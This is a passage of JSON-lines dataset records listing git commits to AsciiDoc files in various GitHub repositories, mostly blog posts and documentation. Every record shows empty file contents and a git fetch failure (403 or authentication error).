'https:\/\/github.com\/gravitee-io\/gravitee-repository-elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1510c4e7d04a16abd6d54d90dd1e9c64945a7704","subject":"Update 2017-06-25-Dealing-with-team-rejection.adoc","message":"Update 2017-06-25-Dealing-with-team-rejection.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80d997b73ec8757aa02440a41269e232e314fbca","subject":"Update 2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","message":"Update 2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","new_file":"_posts\/2016-04-01-Multiple-libraries-for-assertions-in-your-test-classpath.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c8a1115af8a3cb1b6358881dae2374c0ee6a051","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"897e9a140fb7f6524bdd9437f68a64e6ed3ad185","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4afc1bd54828075ed5b75f6f5dc3fcadeb0df96f","subject":"Update 2016-06-10-studysite.adoc","message":"Update 2016-06-10-studysite.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-studysite.adoc","new_file":"_posts\/2016-06-10-studysite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bde37e5b4f01407173c4b3c1527738ad2d734ccc","subject":"Create PCU-RISE-2017-slides.adoc","message":"Create PCU-RISE-2017-slides.adoc","repos":"pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io","old_file":"_posts\/PCU-RISE-2017-slides.adoc","new_file":"_posts\/PCU-RISE-2017-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pcu-consortium\/pcu-consortium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20d5ac1c06740cba8ea5db7d0bcca7a48ea7abc6","subject":"Hawkular Metrics 0.10.0 - Release","message":"Hawkular Metrics 0.10.0 - Release\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-metrics-0.10.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-metrics-0.10.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8275b57b82f42467a8e9c7b640a1c405f0bd14b","subject":"Adding contribution info","message":"Adding contribution info","repos":"Pivotal-Field-Engineering\/ephemerol,Pivotal-Field-Engineering\/ephemerol,Pivotal-Field-Engineering\/ephemerol","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Pivotal-Field-Engineering\/ephemerol.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"982ea08649aa19cb99f60e902195a883657ebd13","subject":"Create 10principles.adoc","message":"Create 10principles.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"10principles.adoc","new_file":"10principles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"2f47bfc2bdc0a8e9ffda4702e6a59ab785c0015b","subject":"Add Asciidoc sample text","message":"Add Asciidoc sample text","repos":"turesheim\/mylyn-docs-examples","old_file":"org.eclipse.mylyn.docs.epub.examples\/loremipsum.adoc","new_file":"org.eclipse.mylyn.docs.epub.examples\/loremipsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/turesheim\/mylyn-docs-examples.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ff8ab62b80f7e5fea752df6abdb62524907ff314","subject":"Update 2016-05-21-test.adoc","message":"Update 2016-05-21-test.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-21-test.adoc","new_file":"_posts\/2016-05-21-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c514a3ac10f745fa13b3c004914c5db83aa6411","subject":"adds training page","message":"adds training page\n","repos":"clojure\/clojure-site","old_file":"content\/community\/training.adoc","new_file":"content\/community\/training.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a52cfd88c664defb24095bc276c661a66cf224ac","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b443f1132480159bb922bfd372596d3075038594","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95f076938a1263052fae4b61c63c64ab9ab59867","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baee7211e9481def80af0982be780c37c956b1f6","subject":"Rename README.md to README.adoc","message":"Rename README.md to README.adoc","repos":"camunda\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform","old_file":"spring-boot-starter\/README.adoc","new_file":"spring-boot-starter\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/langfr\/camunda-bpm-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89e274af98f2b5284828c8d41f8778c46a2f196f","subject":"y2b create post The Most Requested Smartphone I've NEVER Featured...","message":"y2b create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-24-The%20Most%20Requested%20Smartphone%20I've%20NEVER%20Featured....adoc","new_file":"_posts\/2017-12-24-The%20Most%20Requested%20Smartphone%20I've%20NEVER%20Featured....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77f4c99697d720838e68d35def1f6a6067fb48e4","subject":"y2b create post 200 Uploads! + Zelda Skyward Sword Limited Giveaway","message":"y2b create post 200 Uploads! + Zelda Skyward Sword Limited Giveaway","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-13-200-Uploads--Zelda-Skyward-Sword-Limited-Giveaway.adoc","new_file":"_posts\/2011-12-13-200-Uploads--Zelda-Skyward-Sword-Limited-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e416da38142adde7d7028725d8da1dcccaebaa7","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0079e0fa5d74677aed1e84ae919ee7f405ebbed8","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac158903d403b8441cdb06e27e743a3ed6f15846","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cc06f2f409eee0712d74e3951a02ee5c4b15340","subject":"Replaced the RELEASES.md by an asciidoc version.","message":"Replaced the RELEASES.md by an asciidoc version.\n","repos":"jayware\/entity-essentials","old_file":"RELEASES.asciidoc","new_file":"RELEASES.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jayware\/entity-essentials.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7822a771b30643514510d4f255400d947bf37397","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd54589848eb69f4a5c69c3b9eb49f3d6710390e","subject":"Adding the actual command to build the image and adding a tag, so the output of docker images is the same as the one in the lab","message":"Adding the actual command to build the image and adding a tag, so the output of docker images is the same as the one in the lab\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a30dffe301374fa07eeeecdf1d4ea9e2afad8b2b","subject":"Update 2015-09-18-MatchBox.adoc","message":"Update 2015-09-18-MatchBox.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-18-MatchBox.adoc","new_file":"_posts\/2015-09-18-MatchBox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6922379981195b6c6906b3aa4c9b4a129d32dcfd","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82463d280ddda004331a5f799ace63611058af33","subject":"Eclipse Auto install new version","message":"Eclipse Auto install new version\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0caa5b7cdcc712722c7f80e6dfe76dd4ec5d326","subject":"Update 2017-05-24-i-want-faster-ide.adoc","message":"Update 2017-05-24-i-want-faster-ide.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-24-i-want-faster-ide.adoc","new_file":"_posts\/2017-05-24-i-want-faster-ide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec8cf08462ca684b99441813c900cd98cdadfede","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b62c1fe2a64c5dd6332f15b61af40e0482bf614d","subject":"Update 2015-05-20-GeeCON-2015-wrap-up.adoc","message":"Update 2015-05-20-GeeCON-2015-wrap-up.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-20-GeeCON-2015-wrap-up.adoc","new_file":"_posts\/2015-05-20-GeeCON-2015-wrap-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e05a1c43f1dab7f1700d4a3133f71eacd6586228","subject":"Update 2016-09-20-Java-One-2016-Day-1.adoc","message":"Update 2016-09-20-Java-One-2016-Day-1.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2016-09-20-Java-One-2016-Day-1.adoc","new_file":"_posts\/2016-09-20-Java-One-2016-Day-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc852f8ac5f365d2e0d24173a5bc54344768f7de","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ca0374f3927564a7b4a96a0396a19a7101b188d","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c47addc6b9273c4d398d5fc42c248d422eabbce","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7940a95c6fe7c2f8458132e62f4e708f59d34ec3","subject":"Check install JDK","message":"Check install JDK\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c2e05bc7bf42b7dad48fda98fe4268295493627","subject":"chore(then-or-catch): \u8aad\u307f\u8fbc\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u307e\u3061\u304c\u3063\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63","message":"chore(then-or-catch): \u8aad\u307f\u8fbc\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u307e\u3061\u304c\u3063\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63\n","repos":"cqricky\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,charlenopires\/promises-book,azu\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,charlenopires\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,azu\/promises-book,wangwei1237\/promises-book,azu\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,cqricky\/promises-book,genie88\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,liubin\/promises-book,sunfurong\/promise,oToUC\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,purepennons\/promises-book,mzbac\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,azu\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,charlenopires\/promises-book,dieface\/promises-book,liubin\/promises-book,wenber\/promises-book,cqricky\/promises-book","old_file":"Ch2_HowToWrite\/promise-race.adoc","new_file":"Ch2_HowToWrite\/promise-race.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"885fd6be03f92fa5e408f1940402e6eb7ff744e5","subject":"chore(promise-resolve): add resolve-thenable.adoc to index","message":"chore(promise-resolve): add resolve-thenable.adoc to index\n","repos":"liubin\/promises-book,oToUC\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,sunfurong\/promise,sunfurong\/promise,wangwei1237\/promises-book,genie88\/promises-book,genie88\/promises-book,azu\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,lidasong2014\/promises-book,sunfurong\/promise,genie88\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,cqricky\/promises-book,wenber\/promises-book,wenber\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,purepennons\/promises-book,mzbac\/promises-book,azu\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,wenber\/promises-book,dieface\/promises-book,mzbac\/promises-book,purepennons\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,azu\/promises-book,charlenopires\/promises-book,azu\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1bd96ea42f445b6575ae8de834456ad63b13e4a","subject":"Basic Deployment using the Keycloak Operator","message":"Basic Deployment using the Keycloak Operator\n\nCo-authored-by: V\u00e1clav Muzik\u00e1\u0159 <266c716f8aa37f1b7602aa75cfd3259e02ad7a15@redhat.com>\n","repos":"ahus1\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,srose\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,raehalme\/keycloak,ahus1\/keycloak,mhajas\/keycloak,srose\/keycloak,ahus1\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,keycloak\/keycloak,stianst\/keycloak,raehalme\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,keycloak\/keycloak,mhajas\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,ahus1\/keycloak,keycloak\/keycloak,srose\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,ahus1\/keycloak,srose\/keycloak,thomasdarimont\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,srose\/keycloak,stianst\/keycloak,keycloak\/keycloak,jpkrohling\/keycloak,raehalme\/keycloak,abstractj\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,stianst\/keycloak,reneploetz\/keycloak,stianst\/keycloak","old_file":"docs\/guides\/src\/main\/operator\/basic-deployment.adoc","new_file":"docs\/guides\/src\/main\/operator\/basic-deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 